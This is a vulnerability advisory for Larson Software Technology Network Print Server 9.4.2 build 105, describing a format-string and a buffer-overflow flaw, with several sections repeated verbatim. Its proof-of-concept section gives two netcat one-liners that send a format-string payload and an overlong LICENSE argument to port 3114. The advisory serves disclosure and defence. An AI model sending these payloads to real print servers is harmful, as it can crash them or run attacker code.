Larson Software Technology Network Print Server Format String And Buffer Overflow Vulnerability
BID:27732
Info
Larson Software Technology Network Print Server Format String And Buffer Overflow Vulnerability
| Bugtraq ID: | 27732 |
| Class: | Unknown |
| CVE: |
CVE-2008-0764 CVE-2008-0763 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 11 2008 12:00AM |
| Updated: | Jul 05 2016 09:38PM |
| Credit: | Luigi Auriemma is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Larson Software Technology Network Print Server 9.4.2 build 105 |
| Not Vulnerable: | |
Discussion
Larson Software Technology Network Print Server Format String And Buffer Overflow Vulnerability
Larson Software Technology Network Print Server is prone to a format-string vulnerability and a buffer-overflow vulnerability.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application or crash the application, denying service to legitimate users.
Network Print Server 9.4.2 build 105 and prior versions are affected.
Larson Software Technology Network Print Server is prone to a format-string vulnerability and a buffer-overflow vulnerability.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application or crash the application, denying service to legitimate users.
Network Print Server 9.4.2 build 105 and prior versions are affected.
Exploit / POC
Larson Software Technology Network Print Server Format String And Buffer Overflow Vulnerability
The following proof-of-concept commands are available:
echo USEP %n%n%n%s%s%s|nc SERVER 3114 -v -v
echo LICENSE aaaaa...160...aaaaa|nc SERVER 3114 -v -v
The following proof-of-concept commands are available:
echo USEP %n%n%n%s%s%s|nc SERVER 3114 -v -v
echo LICENSE aaaaa...160...aaaaa|nc SERVER 3114 -v -v
Solution / Fix
Larson Software Technology Network Print Server Format String And Buffer Overflow Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Larson Software Technology Network Print Server Format String And Buffer Overflow Vulnerability
References:
References:
- Vendor Homepage (Larson Software Technology)
- Format string and buffer-overflow in Lst Network Print Server 9.4.2 build 105 (Luigi Auriemma
)